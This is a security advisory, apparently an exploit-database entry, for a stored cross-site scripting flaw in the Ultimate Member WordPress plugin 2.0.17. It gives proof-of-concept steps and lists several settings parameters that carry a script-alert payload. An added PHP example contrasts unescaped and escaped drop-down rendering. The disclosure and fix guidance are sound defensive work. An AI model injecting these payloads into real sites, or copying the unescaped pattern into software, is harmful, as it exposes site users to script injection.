Exploit Author: Mohammed Ansari (ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: June 8 2018
Affected Version: 2.0.17
Bug has been fixed in 2.0.18 on July 3, 2018.
Active installations: 100,000+
Plugin: https://wordpress.org/plugins/ultimate-member/
Description
Ultimate Member is the user profile & membership plugin for WordPress. The plugin makes it a breeze for users to sign-up and become members of your website. The plugin allows you to add beautiful user profiles to your site and is perfect for creating advanced online communities and membership sites. Lightweight and highly extendible, Ultimate Member will enable you to create almost any type of site where users can join and become members with absolute ease.
Classification
Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE: CWE-79
Proof of Concept
1. Create a page with the title <script>alert(1);</script>
2. Navigate to Ultimate Member -> Settings. The title is reflected in the General tab.
Affected vectors
All vectors were affected by XSS, because data fetched from the page title is output without proper validation or escaping. Example: showing the title in the options (drop-down box): um_options%5Bcore_user%5D=<script>alert(1);</script>
- um_options%5Bcore_user%5D → <script>alert(1);</script>
- um_options%5Bcore_login%5D → <script>alert(1);</script>
- um_options%5Bcore_register%5D → <script>alert(1);</script>
- um_options%5Bcore_members%5D → <script>alert(1);</script>
- um_options%5Bcore_logout%5D → <script>alert(1);</script>
- um_options%5Bcore_account%5D → <script>alert(1);</script>
- um_options%5Bcore_password-reset%5D → <script>alert(1);</script>
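The missing output escaping described above, as an added example that is not the plugin's own code: a hypothetical drop-down renderer in plain PHP, first concatenating page titles as-is, then escaping them at output time. The function names and sample pages are constructed for illustration; in WordPress, esc_attr() and esc_html() take the place of htmlspecialchars() here.

```php
<?php
// Added example: hypothetical helpers, not the Ultimate Member source.
// They model a settings drop-down that lists page titles as <option> labels.

// Constructed sample data: page ID => title, as stored in the database.
$pages = [
    12 => 'Login',
    13 => '<script>alert(1);</script>',
    14 => 'Members & "Friends"',
];

// Vulnerable pattern: the stored title is concatenated into markup unchanged.
function render_select_unsafe(string $name, array $pages, int $selected): string
{
    $html = '<select name="' . $name . '">';
    foreach ($pages as $id => $title) {
        $sel = ($id === $selected) ? ' selected' : '';
        $html .= '<option value="' . $id . '"' . $sel . '>' . $title . '</option>';
    }
    return $html . '</select>';
}

// Hardened pattern: escape every dynamic value at output time.
// In WordPress: esc_attr() for attribute values, esc_html() for element text.
function render_select_safe(string $name, array $pages, int $selected): string
{
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    $html = '<select name="' . $esc($name) . '">';
    foreach ($pages as $id => $title) {
        $sel = ((int) $id === $selected) ? ' selected' : '';
        $html .= '<option value="' . (int) $id . '"' . $sel . '>'
               . $esc((string) $title) . '</option>';
    }
    return $html . '</select>';
}

$unsafe = render_select_unsafe('um_options[core_user]', $pages, 12);
$safe   = render_select_safe('um_options[core_user]', $pages, 12);

// Report whether a raw <script> tag survives in each rendering.
var_dump(strpos($unsafe, '<script>') !== false);
var_dump(strpos($safe, '<script>') !== false);
echo $safe, PHP_EOL;
```

Escaping belongs at the point of output because the title is stored once but rendered in several settings fields, each of which has to neutralize it independently.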